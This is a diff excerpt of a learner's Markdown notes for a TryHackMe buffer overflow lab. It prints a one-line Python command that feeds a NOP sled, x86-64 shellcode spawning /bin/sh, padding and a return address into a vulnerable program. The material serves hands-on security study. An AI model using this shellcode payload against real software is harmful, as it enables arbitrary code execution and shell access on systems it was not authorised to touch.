dshivnit/cyber-security-course/cyber-security-course/2.0 Hardware/2.1 Central Processing Units (CPU's)/x86 Architecture.md

 	`python -c "print('\90' * 30 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + '\x41' * 60 + '\xef\xbe\xad\xde') | ./program-name"
 	- lol `deadbeef` ^
 	- There can be cases where you need to pass xargs before the ./prrogram-name
 - *oof.
-After a while I had to look up some additional information because my knowledge-set with debugging and with C is very limited at this stage (if even existent!)*
+After a while, a decent while, I had to look up some additional information because my knowledge-set with debugging and with C is very limited at this stage (if even existent!)*
 ---
 **This entire part here is workings alongside the following write-up for https://tryhackme.com/room/bof1 - Task 8**